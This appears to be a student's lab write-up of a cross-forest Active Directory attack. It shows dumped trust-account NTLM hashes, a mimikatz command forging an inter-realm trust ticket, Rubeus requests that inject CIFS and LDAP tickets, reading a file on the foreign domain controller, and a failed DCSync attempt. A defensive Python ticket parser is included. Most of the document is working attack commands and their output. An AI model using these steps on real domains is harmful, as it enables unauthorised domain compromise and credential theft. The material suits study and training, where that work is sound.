# Learning Objective - 20

## Across Forest using Trust Tickets

We need the NT hash of the inter-forest trust account. In the dump below, the relevant entry is ecorp$, the trust account for eurocorp.local; its hash is the one passed as /rc4 when forging the ticket.

```
SMB         172.16.2.1      445    DCORP-DC         mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB         172.16.2.1      445    DCORP-DC         US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB         172.16.2.1      445    DCORP-DC         ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::
```

Creating an inter-forest TGT (the trust ticket).

```
C:\AD\Tools>mimikatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4501e4c7f30e1cb3c9886f06a3ed1c6a /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4501e4c7f30e1cb3c9886f06a3ed1c6a /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4501e4c7f30e1cb3c9886f06a3ed1c6a - rc4_hmac_nt
Service   : krbtgt
Target    : eurocorp.local
Lifetime  : 3/4/2024 2:30:48 AM ; 3/2/2034 2:30:48 AM ; 3/2/2034 2:30:48 AM
-> Ticket : trust_forest_tkt.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!

```

Then we use the ticket with Rubeus to request a CIFS service ticket for the eurocorp DC and inject it into the current session (/ptt).

```
C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.local'
[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  cifs/eurocorp-dc.eurocorp.local
  ServiceRealm             :  EUROCORP.LOCAL
  UserName                 :  Administrator
  UserRealm                :  dollarcorp.moneycorp.local
  StartTime                :  3/4/2024 2:30:59 AM
  EndTime                  :  3/4/2024 12:30:59 PM
  RenewTill                :  3/11/2024 3:30:59 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  oNlPdIgC24awtz+BVQX1wzqgdfUXi1Klpo/4OUzvhd8=


```

Now we can query the eurocorp DC, list the share and read the contents of secret.txt.

```
C:\AD\Tools>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
 Volume in drive \\eurocorp-dc.eurocorp.local\SharedwithDCorp has no label.
 Volume Serial Number is 1A5A-FDE2

 Directory of \\eurocorp-dc.eurocorp.local\SharedwithDCorp

11/16/2022  04:26 AM    <DIR>          .
11/15/2022  06:17 AM                29 secret.txt
               1 File(s)             29 bytes
               1 Dir(s)  12,755,787,776 bytes free

C:\AD\Tools>type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
Dollarcorp DAs can read this!
C:\AD\Tools>
```
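Rubeus prints the ticket as a base64 KRB-CRED (.kirbi), which is plain DER, so a responder who finds such a file or log line can read who it is for, what service it grants and how long it lives without any tooling. The following script is an added example, not part of these notes or of Rubeus: it walks the DER of the cifs ticket above (the ldap ticket in the DCSync section decodes the same way) and assumes a two-part service name and the default 10-hour ticket lifetime for its `exceeds_default_policy` flag, which the forged inter-realm TGT with the 10-year lifetime mimikatz printed above would trip.

```python
import base64
from datetime import datetime
# Input: the cifs/ ticket (KRB-CRED "kirbi") Rubeus printed above, copied verbatim; Rubeus stores its EncKrbCredPart with etype 0 (plaintext), so no key is needed.
KIRBI_B64 = (
    "doIFjjCCBYqgAwIBBaEDAgEWooIEcDCCBGxhggRoMIIEZKADAgEFoRAbDkVVUk9DT1JQLkxPQ0FMoi0wK6ADAgECoSQwIhsEY2lmcxsaZXVyb2NvcnAtZGMuZXVyb2NvcnAubG9jYWyjggQaMIIEFqADAgESoQMCAQqiggQIBIIEBAgZKzPmmUITcuwUbfM/uLcsByEwg/dMg8Y0vkQZux0opKlDvj08pvby44Q4Th16IKXZ"
    "1xFXwcpgrSdps3RU498Y4bVonA3EswaEbAqFeofHr/8y7xQN/XmWHkVrAtiFPswkTLo653JwinVCKPsocKJCS0GllF0jWj35vM+S3z1XJQf2ZtHcCa5FepYdSj/Xa5nGYikyhOrhCvWBMCaZ5GWlqEPURS7UUmKCCOaKC7eFq92gcKsGKfYk5BawabmrCpBZP+5h0PK1qmK0BeQkLIo2z9ajPMFi0ec7onCm/IyVh252I9P/"
    "wh4GmJKcMyDoXZ4q11gVBVjKcttXbaGeYXNOwbUC4j7ucRb6F4oKabveqtoXkgDKSR4OwUhcAUCR11irjKn4rqhciYvkzcphaWyv8lpTbp2gmqGL4doURnmEYOL/djR/gXiWdgOdeeTH4j8N2RKY+c7N8wA9bFKdmfN+WSfrNl+DBv8RTsr4sBlzkYDQhpcW2q6805pvR+1strtDPm6kM6xyIGeyvULp2FzsM9LX2Mj1sVtO"
    "6Xz6SFUUxD/w4tZX7Ra43A0ESWJ+Eh9yAGRuAOCrXeh+5lFeYTsJXzd1BBMT73zUZ+tm9b8Rz7VXD65qinFpJ9qTUzE48yq8c0gbYx6Nhy8Fg3bn6mezPFxS+t5pdACRA2l49/xlpaLlKpj8Mz+/myMT0533dGBopLNF6IkSg4NhptEcZwZJo7QVJK6+E66ZgcBX5BNHYjCeVnh+O2oAQycrbbhuOYHo/RUxhbXVPCKaB/Gn"
    "pbsvImS3lbWxxI2KEhpWPtKihGZdpG3rU8q33nRpYRcQm+31kvInTRw1RrbT2m4SZb3oea7VGuOeTPBGmgGfyeOQFMO0Jkuivaubk6sc8rCz9XHBFmgVwzw5RNp8K/YmqHlkKNHUrPhYmaWFNzKJLkZcoksxEsBv8axwax7sxRTtTVX1FzoSQzJaFqu49D0ebq9c7Vqpk5KJip1Ti0YJ1FU57PSHQ30P7P5y7bIBqLDmmASm"
    "7TGC69ehiDutDllQb71684+ucr7ly8qL62EmyBMYEz5Je+cen0dwPjOFDTvnlAlhBHQNAI/hlo3wNuTYO22D8Jl0hKFPdBF2BK1Sg+CUgY3Qhoy8NDW0yAuG2D34gvHihbBp//ctps7P+BaBtShVIMwovvnSBU25CoEQTy5ZOaTvWLlSAApT7gbU9IoS4+kl0k+y9lj+r6HHm/4W3YH0y+8emhkUajnRjQ8xuGmX5DPPwCoi"
    "662DKgrGoU16Tcnviziois6d76DXuCD8VCJFcwJhopk+Dzr3NiBj+WgBYkVoXBguFjCPPBZIB3T8rKCOWGpK8BiPI29JIzz5uRVf1gcNo4IBCDCCAQSgAwIBAKKB/ASB+X2B9jCB86CB8DCB7TCB6qArMCmgAwIBEqEiBCCg2U90iALbhrC3P4FVBfXDOqB19ReLUqWmj/g5TO+F36EcGxpkb2xsYXJjb3JwLm1vbmV5Y29y"
    "cC5sb2NhbKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEClAAClERgPMjAyNDAzMDQxMDMwNTlaphEYDzIwMjQwMzA0MjAzMDU5WqcRGA8yMDI0MDMxMTEwMzA1OVqoEBsORVVST0NPUlAuTE9DQUypLTAroAMCAQKhJDAiGwRjaWZzGxpldXJvY29ycC1kYy5ldXJvY29ycC5sb2NhbA=="
)

def walk(buf, start, end, out):
    """Collect ("str"|"time"|"bytes", value) leaves from the DER in buf[start:end]; OCTET
    STRINGs are tried as nested DER (the plaintext EncKrbCredPart parses, ciphertext does not)."""
    pos = start
    while pos < end:
        tag, length, pos = buf[pos], buf[pos + 1], pos + 2
        if length & 0x80:  # long-form length: low bits give the byte count
            n = length & 0x7F
            length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
        if pos + length > end:
            raise ValueError("TLV overruns its container")
        vs, ve = pos, pos + length
        if tag & 0x20:  # constructed: SEQUENCE, [n] context tag or APPLICATION tag
            walk(buf, vs, ve, out)
        elif tag in (0x1B, 0x18):  # GeneralString (realm, name) or GeneralizedTime
            out.append(("str" if tag == 0x1B else "time", buf[vs:ve].decode("ascii")))
        elif tag == 0x04:
            inner = []
            try:
                walk(buf, vs, ve, inner)
                out.extend(inner)
            except (ValueError, IndexError, UnicodeDecodeError):
                out.append(("bytes", ve - vs))  # encrypted ticket body or raw session key
        pos = ve

def summarize(b64):
    """Client, service and validity; assumes a two-part sname and the default 10 h lifetime."""
    raw, leaves = base64.b64decode(b64), []
    walk(raw, 0, len(raw), leaves)
    strs = [v for k, v in leaves if k == "str"]
    prealm, pname, srealm, svc, host = strs[-5:]  # KrbCredInfo: prealm, pname, srealm, sname
    stamps = [v for k, v in leaves if k == "time"][-3:]  # starttime, endtime, renew-till
    start, end, renew = (datetime.strptime(t, "%Y%m%d%H%M%SZ") for t in stamps)
    hours = (end - start).total_seconds() / 3600
    return {"ticket_realm": strs[0], "client": f"{pname}@{prealm}", "service": f"{svc}/{host}@{srealm}",
            "lifetime_hours": hours, "renewable_days": (renew - start).days, "exceeds_default_policy": hours > 10}
```

summarize(KIRBI_B64) reports Administrator@dollarcorp.moneycorp.local, service cifs/eurocorp-dc.eurocorp.local@EUROCORP.LOCAL, a 10-hour lifetime and 7 days renewable, matching the Rubeus output above.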

## DCSync

To attempt DCSync, we request the ticket for the LDAP service instead when loading it.

```
C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:ldap/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'ldap/eurocorp-dc.eurocorp.local'
[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  ldap/eurocorp-dc.eurocorp.local
  ServiceRealm             :  EUROCORP.LOCAL
  UserName                 :  Administrator
  UserRealm                :  dollarcorp.moneycorp.local
  StartTime                :  3/4/2024 2:37:28 AM
  EndTime                  :  3/4/2024 12:37:28 PM
  RenewTill                :  3/11/2024 3:37:28 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  7RXIWkPHMll2zs93v/FSfJsl/n7fGHeTVb81dL8iEy8=


```

It doesn't work and I don't know exactly why; it must be limited to certain queries.

```
C:\AD\Tools>mimikatz.exe "lsadump::dcsync /user:ecorp\Administrator /domain:eurocorp.local" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:ecorp\Administrator /domain:eurocorp.local
[DC] 'eurocorp.local' will be the domain
[DC] 'eurocorp-dc.eurocorp.local' will be the DC server
[DC] 'ecorp\Administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)

mimikatz(commandline) # exit
Bye!

C:\AD\Tools>
```
